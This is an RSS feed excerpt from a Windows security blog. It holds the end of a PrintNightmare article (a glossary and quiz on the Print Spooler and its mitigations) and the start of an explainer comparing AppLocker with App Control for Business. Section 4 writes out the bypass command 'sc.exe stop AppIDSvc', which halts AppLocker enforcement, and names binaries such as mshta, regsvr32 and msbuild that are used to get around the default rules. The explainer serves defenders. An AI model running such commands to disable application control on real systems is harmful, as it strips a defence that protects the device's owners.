  { term: &quot;Print Provider DLL chain&quot;, definition: &quot;The three router-loaded DLLs that dispatch print operations to the appropriate transport: localspl.dll (Local), win32spl.dll (Remote), inetpp.dll (HTTP/IPP). Often confused with the Print Processor layer; the Provider handles which printer, the Processor handles how to render the page.&quot; },
  { term: &quot;Print Processor (winprint.dll)&quot;, definition: &quot;The component that interprets the spool file format (EMF, XPS, RAW, TEXT) and renders pages for a specific printer. winprint.dll is the default. A separate layer from the Print Providers.&quot; },
  { term: &quot;MS-RPRN and MS-PAR&quot;, definition: &quot;Microsoft&apos;s synchronous (MS-RPRN) and asynchronous (MS-PAR) print-system RPC protocols. Both bind to the named pipe PIPE spoolss. The MS-PAR spec verbatim describes RpcAsyncAddPrinterDriver as the counterpart of MS-RPRN&apos;s RpcAddPrinterDriverEx.&quot; },
  { term: &quot;Point and Print&quot;, definition: &quot;Windows behavior in which a non-admin user causes their machine to download and install a printer driver from a print server on first use. Governed by the registry values NoWarningNoElevationOnInstall, NoWarningNoElevationOnUpdate, and overridden by RestrictDriverInstallationToAdministrators.&quot; },
  { term: &quot;PrintIsolationHost.exe&quot;, definition: &quot;Sibling host process introduced in Windows 7 / Server 2008 R2 (October 22, 2009) that can load third-party printer driver code outside spoolsv.exe. The isolation is process isolation, not privilege isolation; the host runs as LocalSystem by default.&quot; },
  { term: &quot;AppContainer&quot;, definition: &quot;A Windows process sandboxing primitive with a custom integrity level, a restricted token, and a set of explicitly granted capabilities. Microsoft has not deployed AppContainer to spoolsv.exe because of the back-compat constraint with v3/v4 drivers.&quot; },
  { term: &quot;Windows Protected Print Mode (WPP)&quot;, definition: &quot;An opt-in Windows print stack introduced with Windows 11 24H2 (October 1, 2024) that blocks all third-party drivers, runs normal operations in a Spooler Worker process with a restricted token below SYSTEM integrity, and falls back to the inbox Microsoft IPP Class Driver.&quot; },
  { term: &quot;IPP class driver / Mopria certification&quot;, definition: &quot;The Microsoft-supplied inbox driver that uses the Internet Printing Protocol to communicate with printers implementing the Mopria-certified IPP everywhere subset. WPP-enforced clients use this driver instead of vendor-specific v3 drivers.&quot; },
  { term: &quot;v3 vs v4 driver model&quot;, definition: &quot;The two pre-WPP Windows printer driver packaging models. v3 (Windows 2000 era) loads driver render code into the spooler process by default. v4 (Windows 8 era) is XPS-based and more portable. WPP deprecates both in favor of the inbox IPP class driver.&quot; },
  { term: &quot;Universal Print&quot;, definition: &quot;Microsoft&apos;s cloud-hosted print service (GA March 2, 2021). Eliminates print servers like OneDrive eliminates file servers. The architectural exit it takes is breaking conjunct (a): no local pipe spoolss exposed on a Universal-Print-only endpoint.&quot; },
  { term: &quot;Redirection Guard&quot;, definition: &quot;A Windows process mitigation that refuses to follow filesystem junctions or symbolic links created by non-administrator users. Enabled on spoolsv.exe via Set-ProcessMitigation -Name spoolsv.exe -Enable RedirectionGuard. Mitigates the SpoolFool-class reparse-point primitive.&quot; }
]} questions={[
  { q: &quot;Which three Print Provider DLLs are loaded by the spooler router, and which one would handle a printer reached over IPP?&quot;, a: &quot;localspl.dll (Local), win32spl.dll (Remote), inetpp.dll (HTTP/IPP). inetpp.dll handles IPP.&quot; },
  { q: &quot;Why did Microsoft need four patch waves between June 2021 and August 2024 instead of one fix?&quot;, a: &quot;The first patch closed one RPC entry point (MS-RPRN&apos;s RpcAddPrinterDriverEx); the second closed the symmetric MS-PAR entry point (RpcAsyncAddPrinterDriver); the third flipped the RestrictDriverInstallationToAdministrators default from 0 to 1 and published the verbatim &apos;no combination of mitigations is equivalent&apos; concession; the fourth (SpoolFool) and fifth (CVE-2024-38198) exploited filesystem-side primitives that the RPC-side patches did not touch. The patches did not converge because they targeted entry points, not the architectural primitive.&quot; },
  { q: &quot;What is the three-conjunct architectural primitive that every PrintNightmare-class bug exploits, and how does each shipped Microsoft exit break exactly one conjunct?&quot;, a: &quot;(a) low-priv RPC entry, (b) caller-influenced DLL load, (c) SYSTEM context. Universal Print breaks (a); WPP module blocking breaks (b); WPP Spooler Worker and PrintIsolationHost.exe break (or weaken) (c).&quot; },
  { q: &quot;Why does Microsoft not sandbox spoolsv.exe in an AppContainer?&quot;, a: &quot;Because the third-party driver install base (v3/v4 drivers shipped by essentially every Windows-compatible printer manufactured since 1993) is packaged to load in LocalSystem context. Constraining the spooler&apos;s token would break the installed printer base. Microsoft&apos;s architectural exits (WPP module blocking, Spooler Worker, Universal Print) sidestep the constraint rather than violate it.&quot; },
  { q: &quot;What does WPP&apos;s module-blocking policy do, and what is the verbatim sentence Microsoft uses to describe it?&quot;, a: &quot;WPP refuses to load any third-party driver DLL into the spooler. Microsoft&apos;s verbatim phrase is &apos;only Microsoft Signed binaries required for IPP are loaded.&apos; The policy makes Point and Print &apos;never install third-party drivers&apos; on a WPP-enabled host.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>print-spooler</category><category>printnightmare</category><category>spoolfool</category><category>windows-protected-print-mode</category><category>universal-print</category><category>vulnerability-research</category><category>windows-internals</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>AppLocker vs App Control for Business: Two Locks on the Same Door, and Why Windows Still Ships Both in 2026</title><link>https://paragmali.com/blog/applocker-vs-app-control-for-business-two-locks-on-the-same-/</link><guid isPermaLink="true">https://paragmali.com/blog/applocker-vs-app-control-for-business-two-locks-on-the-same-/</guid><description>Windows 11 24H2 ships two parallel application-control systems. One is operational hygiene; the other is the security boundary. The line between them is a single sentence in MSRC servicing criteria.</description><pubDate>Mon, 01 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Windows ships two application-control systems in parallel in 2026: **AppLocker**, a per-user policy evaluator that lives in the user-mode Application Identity service, and **App Control for Business** (still widely called WDAC), a kernel policy evaluator built into `ci.dll`. Microsoft itself states that AppLocker *&quot;doesn&apos;t meet the servicing criteria for being a security feature&quot;* while App Control was *designed* as one under the MSRC servicing criteria. That single sentence explains why both still ship. AppLocker handles per-user policy on devices that have no code-signing PKI. App Control, with a signed policy and HVCI on, is the only configuration that survives an admin-equivalent attacker. This article walks the architecture of each, the structural ceilings of both, the role of ISG and the Recommended Block Rules, and the five-question decision tree for picking between them in 2026.
&lt;h2&gt;1. Two Locks on the Same Door&lt;/h2&gt;
&lt;p&gt;Sit down on a Windows 11 24H2 device in 2026. Open &lt;code&gt;gpedit.msc&lt;/code&gt;. Navigate to Computer Configuration -&amp;gt; Windows Settings -&amp;gt; Security Settings, and you will find a node called &lt;strong&gt;AppLocker&lt;/strong&gt;, with five rule collections waiting to be populated. Now walk one branch over to Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; System -&amp;gt; &lt;strong&gt;Device Guard&lt;/strong&gt;. That node, despite the obsolete name in the GPO tree, is where you author policy for what Microsoft now calls &lt;strong&gt;App Control for Business&lt;/strong&gt; [@ms-appcontrol-applocker-overview] -- the same kernel-enforced application-control engine that has been renamed twice since launch (Configurable Code Integrity in 2015, Windows Defender Application Control in 2017, App Control for Business in 2024) [@ms-blog-introducing-wdac-2017] but never replaced.&lt;/p&gt;
&lt;p&gt;Two completely separate policy nodes. Two completely separate deployment surfaces. Two completely separate enforcement architectures. Both shipping in the same SKU on the same device in 2026. Both documented as currently supported on Microsoft Learn [@ms-appcontrol-applocker-overview]. Which one is &quot;the right one&quot;? The honest answer turns out to be &lt;em&gt;neither, and both,&lt;/em&gt; and the reason is a single sentence on a single Microsoft Learn page that draws a line between &lt;em&gt;security feature&lt;/em&gt; and &lt;em&gt;operational hygiene control&lt;/em&gt; sharper than most practitioners realise.&lt;/p&gt;

A policy mechanism that decides, at process-launch or image-load time, whether a given binary, script, or installer is allowed to execute on a Windows device. An application-control policy is an enumerated set of allow rules (an allowlist), deny rules (a blocklist), or both. The decision is made by an OS-resident evaluator before the binary&apos;s main entry point runs.
&lt;p&gt;Microsoft&apos;s own &lt;em&gt;App Control and AppLocker Overview&lt;/em&gt; page makes the line explicit. AppLocker [@ms-appcontrol-applocker-overview], in Microsoft&apos;s own words, &lt;em&gt;&quot;helps to prevent end-users from running unapproved software on their computers but doesn&apos;t meet the servicing criteria for being a security feature.&quot;&lt;/em&gt; App Control for Business, in contrast, was &lt;em&gt;&quot;designed as a security feature under the servicing criteria, defined by the Microsoft Security Response Center&quot;&lt;/em&gt; [@ms-appcontrol-applocker-overview]. The &lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;MSRC servicing criteria&lt;/a&gt; are not marketing copy. They are the rule that decides whether a defect in a Windows feature gets a CVE [@msrc-servicing-criteria]. AppLocker bypasses do not get CVEs. App Control bypasses, with the right configuration, do.&lt;/p&gt;

flowchart LR
    Root[&quot;Computer Configuration&quot;]
    Sec[&quot;Windows Settings&quot;]
    Adm[&quot;Administrative Templates&quot;]
    SecSet[&quot;Security Settings&quot;]
    Sys[&quot;System&quot;]
    AL[&quot;AppLocker node&lt;br /&gt;(user-mode AppIDSvc)&quot;]
    DG[&quot;Device Guard node&lt;br /&gt;(kernel ci.dll / App Control for Business)&quot;]
    Root --&amp;gt; Sec
    Root --&amp;gt; Adm
    Sec --&amp;gt; SecSet
    SecSet --&amp;gt; AL
    Adm --&amp;gt; Sys
    Sys --&amp;gt; DG
&lt;p&gt;The rest of this article pays off that one sentence. The first half walks the architecture of each system at the level of &lt;em&gt;who evaluates what, where in the operating system, and against which attacker&lt;/em&gt;. The second half makes the practitioner decision tractable: which one to deploy in 2026, what to pair it with, and what no allowlist of any generation can do.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; AppLocker and App Control for Business are not two generations of the same product. They are two different products solving two different problems. AppLocker is an operational hygiene control whose enforcement Microsoft itself disclaims as a security boundary. App Control for Business, when its policy is signed by the deploying organisation and HVCI is on, &lt;strong&gt;is&lt;/strong&gt; the security boundary. Both still ship because neither is a strict superset of the other.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If both are shipping and both are recommended in different Microsoft Learn pages, what exactly does each one &lt;em&gt;do&lt;/em&gt;? And why is the line between them drawn in Microsoft&apos;s &lt;em&gt;servicing criteria&lt;/em&gt; rather than in its feature inventory? To answer that, we have to start before either product existed.&lt;/p&gt;
&lt;h2&gt;2. Pre-History -- Why an OS Needs Application Control at All&lt;/h2&gt;
&lt;p&gt;The 1999-2001 macro-virus and worm era -- &lt;em&gt;ILOVEYOU&lt;/em&gt; [@cert-ca-2000-04-iloveyou], &lt;em&gt;Code Red&lt;/em&gt; [@cert-ca-2001-19-codered], &lt;em&gt;Nimda&lt;/em&gt; [@cert-ca-2001-26-nimda] -- made it unsurvivable for Windows to trust any binary the user had &lt;code&gt;Execute&lt;/code&gt; permission on. The default behaviour of a Windows desktop in that era was: if the bits are on disk and the user can read them, they run. There was no per-binary policy gate. The OS-level answer Microsoft shipped in October 2001 was &lt;strong&gt;Software Restriction Policies&lt;/strong&gt;, an XP RTM feature documented at length the following year by John Lambert at Virus Bulletin 2002 [@vb2002-srp].&lt;/p&gt;

The user-mode Windows API (`WinSafer*`) that SRP used to evaluate a candidate executable against the configured rule set. The SAFER evaluator returned one of three security levels -- `Disallowed`, `Basic User`, or `Unrestricted` -- on each `CreateProcess`. The decision lived entirely in user mode, in the same address space as the loader, which is the architectural defect AppLocker partially inherited and App Control later corrected.
&lt;p&gt;SRP supported five rule conditions [@ms-applocker-what-is]: &lt;strong&gt;hash, certificate, path, Internet zone, and registry path&lt;/strong&gt;. Each condition tested a candidate file against an administrator-authored allow or deny rule, returning a SAFER security level that the user-mode evaluator honoured at &lt;code&gt;CreateProcess&lt;/code&gt;. The model was right: a per-machine GPO-administered policy evaluated against a defined file taxonomy.&lt;/p&gt;

The Microsoft code-signing format that binds a publisher identity (an X.509 certificate chain) to a PE binary via a cryptographic signature embedded in the binary&apos;s optional header. Authenticode is the *plumbing* every Windows application-control system uses to answer the question &quot;who published this binary?&quot; -- but it cannot answer &quot;what will this binary do once it runs?&quot;. Authenticode mechanics are out of scope here; the companion Authenticode article covers them in full.
&lt;p&gt;But SRP&apos;s &lt;em&gt;management surface&lt;/em&gt; was a series of footguns. There were no per-user rules. There was no audit-only mode -- you authored a rule and immediately enforced it. There was no PowerShell module; configuration was an MMC snap-in click path. And the Internet-Zone rule was structurally narrow: it applied only to Windows Installer (&lt;code&gt;.msi&lt;/code&gt;) packages and keyed off the source zone Windows Installer computed at install time, so it never covered the &lt;code&gt;.exe&lt;/code&gt; and script payloads that mattered most.The &lt;code&gt;Zone.Identifier&lt;/code&gt; ADS is also silently stripped by FAT and exFAT copies, by many archive formats during extraction, and by any process that rewrites the file. SRP&apos;s zone rule was therefore reliable only against the most casual download paths -- exactly the threat model SRP claimed to address. The structural reason AppLocker dropped Internet Zone as a rule condition in 2009 starts here.&lt;/p&gt;
&lt;p&gt;SRP is genealogy, not subject matter, for the rest of this article. Microsoft never formally deprecated it, but practitioners abandoned it within a year of AppLocker&apos;s 2009 release, and Microsoft Learn now points anyone arriving at the SRP page toward AppLocker or App Control. The three operational defects -- no per-user, no audit, no PowerShell -- sketch the brief that the AppLocker team would inherit. What did Microsoft actually ship in 2009, and where did its designers draw the line between &lt;em&gt;manageability&lt;/em&gt; and &lt;em&gt;security&lt;/em&gt;?&lt;/p&gt;

flowchart TD
    SRP[&quot;2001 -- Software Restriction Policies&lt;br /&gt;(Windows XP RTM)&lt;br /&gt;user-mode SAFER API&quot;]
    AL[&quot;2009 -- AppLocker&lt;br /&gt;(Windows 7 / Server 2008 R2)&lt;br /&gt;user-mode AppIDSvc + AppID.sys minifilter&quot;]
    CCI[&quot;2015 -- Configurable Code Integrity&lt;br /&gt;(Windows 10 1507, under Device Guard umbrella)&lt;br /&gt;kernel ci.dll&quot;]
    WDAC[&quot;2017 -- Windows Defender Application Control&lt;br /&gt;(Windows 10 1709)&lt;br /&gt;same kernel ci.dll, new brand&quot;]
    ACfB[&quot;2024 -- App Control for Business&lt;br /&gt;(Windows 11 24H2 / Server 2025)&lt;br /&gt;same kernel ci.dll, third brand&quot;]
    Now[&quot;2026 -- both AppLocker and App Control for Business ship in the same SKU&quot;]
    SRP -- effectively orphaned --&amp;gt; AL
    AL -- peer mechanism added, not replaced --&amp;gt; CCI
    CCI -- renamed --&amp;gt; WDAC
    WDAC -- renamed --&amp;gt; ACfB
    AL -- still ships --&amp;gt; Now
    ACfB -- still ships --&amp;gt; Now
&lt;h2&gt;3. AppLocker (2009) -- The Architecture Microsoft Documents&lt;/h2&gt;
&lt;p&gt;October 22, 2009. AppLocker ships in Windows 7 Enterprise / Ultimate and in Windows Server 2008 R2 [@ms-lifecycle-windows7] [@ms-lifecycle-server-2008-r2]. What did Microsoft actually build, exactly as Microsoft Learn documents it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Five rule collections&lt;/strong&gt; [@ms-applocker-rules]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Executable&lt;/strong&gt; -- &lt;code&gt;.exe&lt;/code&gt;, &lt;code&gt;.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DLL&lt;/strong&gt; -- &lt;code&gt;.dll&lt;/code&gt;, &lt;code&gt;.ocx&lt;/code&gt; (off by default; opt-in for performance reasons)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Script&lt;/strong&gt; -- &lt;code&gt;.ps1&lt;/code&gt;, &lt;code&gt;.vbs&lt;/code&gt;, &lt;code&gt;.js&lt;/code&gt;, &lt;code&gt;.bat&lt;/code&gt;, &lt;code&gt;.cmd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Windows Installer&lt;/strong&gt; -- &lt;code&gt;.msi&lt;/code&gt;, &lt;code&gt;.msp&lt;/code&gt;, &lt;code&gt;.mst&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Packaged App&lt;/strong&gt; -- &lt;code&gt;.appx&lt;/code&gt;, &lt;code&gt;.msix&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The script collection&apos;s inclusion of &lt;code&gt;.bat&lt;/code&gt; and &lt;code&gt;.cmd&lt;/code&gt; is a coverage detail that survives into 2026 as one of the few capabilities AppLocker has and App Control does not [@ms-appcontrol-feature-availability]. Hold that thought; it returns in section 10.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Three rule conditions&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Publisher&lt;/strong&gt; -- the &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt; subject name, product name, file name, and minimum file version. The load-bearing usability win over SRP: a single Publisher rule for &lt;em&gt;&quot;binaries signed by Microsoft Corporation with product &lt;code&gt;Office&lt;/code&gt;, version 16.0 or higher&quot;&lt;/em&gt; survives every patch the vendor ships.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Path&lt;/strong&gt; -- with environment-variable and wildcard support (&lt;code&gt;%ProgramFiles%\Contoso\*.exe&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File Hash&lt;/strong&gt; -- the SHA-256 of the binary. Stable but brittle; one update breaks the rule.&lt;/li&gt;
&lt;/ol&gt;

An AppLocker (or App Control) rule that allows or denies execution based on the Authenticode signer subject, the file&apos;s signed metadata (Original Filename, Product Name), and an optional minimum version. The publisher gate trusts the certificate authority&apos;s binding of signer name to private key; it does not evaluate what the signed code will do at runtime. The structural limit of any publisher-gate allowlist is that signed code can be made to load and execute attacker-controlled data -- this is what the Microsoft Recommended Block Rules in section 8 enumerate.
&lt;p&gt;AppLocker also added the three management capabilities SRP lacked: &lt;strong&gt;per-user / per-group rule assignment&lt;/strong&gt; via the AppLocker PowerShell module (&lt;code&gt;Get-AppLockerPolicy&lt;/code&gt;, &lt;code&gt;Set-AppLockerPolicy&lt;/code&gt;, &lt;code&gt;Test-AppLockerPolicy&lt;/code&gt;, &lt;code&gt;New-AppLockerPolicy&lt;/code&gt;), &lt;strong&gt;audit-only mode&lt;/strong&gt; that logs would-be denials without enforcing them, and a real GPO editor experience under Security Settings. The per-user capability is still, in 2026, the operational reason AppLocker has not gone away [@ms-appcontrol-feature-availability]; we will return to that in section 11.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The architecture is the part most readers underestimate.&lt;/strong&gt; AppLocker is a &lt;em&gt;kernel-mode minifilter that asks a user-mode service for the verdict.&lt;/em&gt; Microsoft&apos;s &lt;em&gt;AppLocker Architecture and Components&lt;/em&gt; page documents the user-mode side at the service-and-callback level [@ms-applocker-architecture]: the &lt;em&gt;policy decision&lt;/em&gt; is deferred to the user-mode &lt;strong&gt;Application Identity service&lt;/strong&gt; (&lt;code&gt;AppIDSvc&lt;/code&gt;) running as &lt;code&gt;LocalService&lt;/code&gt;, which evaluates policy via &lt;code&gt;SeAccessCheckWithSecurityAttributes&lt;/code&gt; or &lt;code&gt;AuthzAccessCheck&lt;/code&gt; against the calling user&apos;s group memberships, with interception points at process create, DLL load, and script run. The kernel-side component is the &lt;code&gt;AppId.sys&lt;/code&gt; minifilter shipped in &lt;code&gt;%SystemRoot%\System32\drivers\&lt;/code&gt;; it issues the callbacks at process creation, optional DLL load, script-host invocation, MSI execution, and packaged-app activation, and the kernel honours the verdict the service returns.&lt;/p&gt;

The Windows service that evaluates AppLocker rules. Runs as `LocalService` under a service host process. The kernel minifilter `AppID.sys` collects the candidate file&apos;s metadata at the relevant lifecycle hook (process create, image load, script host start) and waits for `AppIDSvc` to return an access decision derived from the active AppLocker policy and the calling user&apos;s token. Stopping `AppIDSvc` stops AppLocker enforcement -- this is the architectural fact the next section turns on.

sequenceDiagram
    participant U as User
    participant K as Kernel (CreateProcess)
    participant Min as AppID.sys minifilter
    participant Svc as AppIDSvc (user mode)
    participant Pol as Active AppLocker policy
    U-&amp;gt;&amp;gt;K: CreateProcess foo.exe
    K-&amp;gt;&amp;gt;Min: process-create callback
    Min-&amp;gt;&amp;gt;Svc: query verdict for foo.exe and caller token
    Svc-&amp;gt;&amp;gt;Pol: AuthzAccessCheck against publisher / path / hash rules
    Pol--&amp;gt;&amp;gt;Svc: allow or deny
    Svc--&amp;gt;&amp;gt;Min: verdict
    Min--&amp;gt;&amp;gt;K: honour verdict
    K--&amp;gt;&amp;gt;U: process starts or STATUS_ACCESS_DENIED
&lt;p&gt;The five-by-three matrix below is the policy surface a practitioner authors against:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Collection / Condition&lt;/th&gt;
&lt;th&gt;Publisher&lt;/th&gt;
&lt;th&gt;Path&lt;/th&gt;
&lt;th&gt;File Hash&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Executable (&lt;code&gt;.exe&lt;/code&gt;, &lt;code&gt;.com&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DLL (&lt;code&gt;.dll&lt;/code&gt;, &lt;code&gt;.ocx&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Script (&lt;code&gt;.ps1&lt;/code&gt;, &lt;code&gt;.vbs&lt;/code&gt;, &lt;code&gt;.js&lt;/code&gt;, &lt;code&gt;.bat&lt;/code&gt;, &lt;code&gt;.cmd&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Installer (&lt;code&gt;.msi&lt;/code&gt;, &lt;code&gt;.msp&lt;/code&gt;, &lt;code&gt;.mst&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Packaged App (&lt;code&gt;.appx&lt;/code&gt;, &lt;code&gt;.msix&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;yes (publisher only)&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The DLL collection is off by default for a reason Microsoft Learn warns about plainly [@ms-applocker-rules]: &lt;em&gt;&quot;When DLL rules are used, AppLocker must check each DLL that an application loads. Therefore, users may experience a reduction in performance if DLL rules are used.&quot;&lt;/em&gt; That cost is paid for every load of every DLL by every running process; on a workstation that loads thousands of DLLs at boot it is observable in startup time. The Packaged App collection is publisher-only because the Universal Windows Platform packaging format always carries an Authenticode signature.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The most common misattribution in the AppLocker literature is the conflation of &lt;em&gt;AaronLocker&lt;/em&gt; with the AppLocker &lt;em&gt;bypass corpus&lt;/em&gt;. AaronLocker [@github-aaronlocker] is &lt;strong&gt;Aaron Margosis&apos;s deployment tool&lt;/strong&gt; -- a PowerShell-based generator that authors thorough audit and enforce policies. The canonical AppLocker &lt;em&gt;bypass&lt;/em&gt; catalogue is Oddvar Moe&apos;s &lt;code&gt;UltimateAppLockerByPassList&lt;/code&gt; [@github-ultimateapplockerbypass]. The canonical App Control bypass catalogue is Jimmy Bayne&apos;s &lt;code&gt;UltimateWDACBypassList&lt;/code&gt; [@github-ultimatewdacbypass]. Three different artefacts, three different authors, three different purposes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;AppLocker&apos;s design is admirable. It fixed every operational defect of SRP, it shipped per-user rules a decade before App Control&apos;s kernel evaluator caught up, and its PowerShell module is still the most ergonomic Windows application-control authoring surface in 2026. But notice one thing about that sequence diagram: the policy decision lives in a user-mode service. What happens to enforcement if the attacker is running as &lt;code&gt;SYSTEM&lt;/code&gt;?&lt;/p&gt;
&lt;h2&gt;4. AppLocker&apos;s Structural Limit -- Why It Was Never a Security Boundary&lt;/h2&gt;
&lt;p&gt;A single PowerShell line. &lt;code&gt;sc.exe stop AppIDSvc&lt;/code&gt; from a &lt;code&gt;LocalSystem&lt;/code&gt; context -- the canonical first-step bypass catalogued in &lt;code&gt;UltimateAppLockerByPassList&lt;/code&gt; [@github-ultimateapplockerbypass] and reproduced in Oddvar Moe&apos;s December 2017 case study [@oddvarmoe-applocker-case-study; @oddvarmoe-applocker-case-study-part2]. Enforcement degrades until the next reboot. Is that a &lt;em&gt;bug&lt;/em&gt;?&lt;/p&gt;
&lt;p&gt;It is not. It is the &lt;em&gt;design&lt;/em&gt;. And three converging pieces of evidence -- Microsoft&apos;s own words, the documented architecture, and the public bypass record -- agree on the scope.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Microsoft&apos;s own servicing-criteria language.&lt;/strong&gt; The &lt;em&gt;App Control and AppLocker Overview&lt;/em&gt; page says, verbatim [@ms-appcontrol-applocker-overview]: &lt;em&gt;&quot;AppLocker helps to prevent end-users from running unapproved software on their computers, but it doesn&apos;t meet the servicing criteria for being a security feature.&quot;&lt;/em&gt; The MSRC &lt;em&gt;Windows Security Servicing Criteria&lt;/em&gt; document [@msrc-servicing-criteria] is the rule the MSRC uses to decide whether a defect in a Windows feature qualifies for a CVE. Defects in a &lt;em&gt;security boundary&lt;/em&gt; receive CVEs and a coordinated patch. Defects in a &lt;em&gt;defense-in-depth&lt;/em&gt; feature may not -- they are documented and, when convenient, fixed, but Microsoft does not promise that every bypass will be treated as a vulnerability. AppLocker is the second category. App Control, when configured to qualify, is the first.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. The user-mode &lt;code&gt;AppIDSvc&lt;/code&gt; architecture is the proximate reason.&lt;/strong&gt; Restate the section-3 diagram: the kernel minifilter &lt;code&gt;AppID.sys&lt;/code&gt; collects the file metadata, but the verdict is returned by &lt;code&gt;AppIDSvc&lt;/code&gt; running in user mode as &lt;code&gt;LocalService&lt;/code&gt;. Any process running as &lt;code&gt;LocalSystem&lt;/code&gt; or with administrator privilege can stop &lt;code&gt;AppIDSvc&lt;/code&gt;. Stopping the service does not just &lt;em&gt;bypass&lt;/em&gt; a rule; it removes the evaluator that the kernel was waiting for. The Microsoft Learn architecture page describes the evaluation surface explicitly [@ms-applocker-architecture]: &lt;em&gt;&quot;AppLocker policies are conditional access control entries (ACEs), and policies are evaluated by using the attribute-based access control SeAccessCheckWithSecurityAttributes or AuthzAccessCheck functions.&quot;&lt;/em&gt; &lt;code&gt;AuthzAccessCheck&lt;/code&gt; is a user-mode Authz API; the evaluation chain ends in a process that an admin can stop.&lt;/p&gt;

The MSRC servicing criteria classify Windows features into *security boundaries* (a violation produces a CVE, fixes are released on Patch Tuesday or out-of-band), *security features* designed against a defined threat model (violations may or may not get CVEs depending on the threat model), and *defense-in-depth* measures (no servicing commitment beyond best effort). AppLocker is explicitly placed in the third class on the *App Control and AppLocker Overview* page [@ms-appcontrol-applocker-overview]. App Control with a signed policy and HVCI on is treated as a security feature whose threat model includes an admin-equivalent attacker -- and that is the precise condition under which an App Control bypass is treated as a CVE-class defect.
&lt;p&gt;&lt;strong&gt;3. The published bypass corpora.&lt;/strong&gt; Oddvar Moe&apos;s &lt;code&gt;UltimateAppLockerByPassList&lt;/code&gt; [@github-ultimateapplockerbypass] catalogues &lt;code&gt;rundll32.exe&lt;/code&gt;, &lt;code&gt;regsvr32.exe&lt;/code&gt;, &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;installutil.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, and a long list of others, each documented to bypass the &lt;em&gt;default&lt;/em&gt; AppLocker rule set without administrator privileges. Moe&apos;s December 2017 case study [@oddvarmoe-applocker-case-study] paired a defined test environment (Windows 10 1703 Enterprise with the default AppLocker rules applied and no third-party software) against a defined adversary capability (an unprivileged interactive user) and demonstrated fourteen distinct bypass techniques. That made &lt;em&gt;&quot;AppLocker is bypassable in practice without admin&quot;&lt;/em&gt; an empirical claim, not a theoretical one.&lt;/p&gt;
&lt;p&gt;And -- this is the part that closes the argument -- the &lt;strong&gt;Microsoft-org-hosted AaronLocker README&lt;/strong&gt; [@github-aaronlocker] states the same scope plainly: &lt;em&gt;&quot;AaronLocker does not try to stop administrative users from running anything they want -- and application control solutions cannot meaningfully restrict administrative actions anyway. A determined user with administrative rights can bypass any application control solution.&quot;&lt;/em&gt; The bypass community and the Microsoft-employee-maintained deployment baseline agree.&lt;/p&gt;
&lt;p&gt;This is the article&apos;s first reorientation. The convergence of the Microsoft servicing-criteria language, the kernel-defers-to-user-mode architecture, and the published bypass record is not three independent observations; it is one observation viewed from three angles. AppLocker is a hygiene control. The bypassability against an admin-equivalent attacker is a &lt;em&gt;scope statement&lt;/em&gt;, not a defect. The misconception that AppLocker was ever supposed to defend against an attacker with &lt;code&gt;SYSTEM&lt;/code&gt; lives in the reader, not in the product.&lt;/p&gt;
&lt;p&gt;The three pieces of evidence, tabulated:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Evidence&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;What it establishes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
